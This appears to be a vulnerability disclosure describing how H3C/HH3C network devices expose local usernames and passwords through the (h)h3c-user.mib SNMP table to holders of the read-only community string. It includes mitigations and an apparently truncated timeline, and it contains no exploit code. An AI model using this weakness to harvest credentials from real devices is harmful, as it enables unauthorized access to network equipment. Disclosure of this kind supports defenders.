The MIBs h3c-user.mib and hh3c-user.mib, for the purpose of this
document, will be referred to as (h)h3c-user.mib. This MIB defines the
internal table and objects to "Manage configuration and Monitor running
state for userlog feature."

This means there are some cool objects with data in this MIB penetration
testers or malicious actors would want to get their dirty little hands
on. Most objects are only accessible with the read/write community string.

In the revision history of (h)h3c-user.mib, version 2.0 modified the
MAX-ACCESS from read-only to read-create the following objects within
the (h)h3cUserInfoEntry sequence:

(h)h3cUserName
(h)h3cUserPassword
(h)h3cAuthMode
(h)h3cUserLevel

The purpose of these objects are to provide the locally configured users
to those with a valid SNMP community. After the change only those with
the read-write community string should have access, however this was not
the case and the code still retained the earlier access of read-only.

So if you have the SNMP public community string then you have the
ability to view these entries.

Why this is impactful
- - ---------------------

The (h)h3cUserPassword is presented in one of three formats as defined
in the (h)h3cAuthMode object and mirrors how passwords are stored in the
device configuration:

These will soon be posted to https://github.com/grutz/h3c-pt-tools and
requested to be added to each tool.

Mitigation
- - ----------

By itself this is already bad but most users who do any of the following
may already be protected:

1. Use complex SNMP community strings or disable SNMPv1
2. Have disabled the mib entries for (h)h3c-user
3. Block SNMP using access controls or firewalls
4. Do not define local users, use RADIUS or TACACS+

More specific routines can be found in the vendor's release.

Why this is a bigger problem
- - ----------------------------

People make poor choices. They like to think their equipment won't rat
them out so they use cleartext passwords on networking equipment.

The cipher is an interesting one because it's basically an unknown...
What, you think the only thing I had to share at Toorcon was SNMP and
some cleartext credentials?

Timeline
- - --------

June-ish 2012: Research begins after seeing something cool on a
penetration test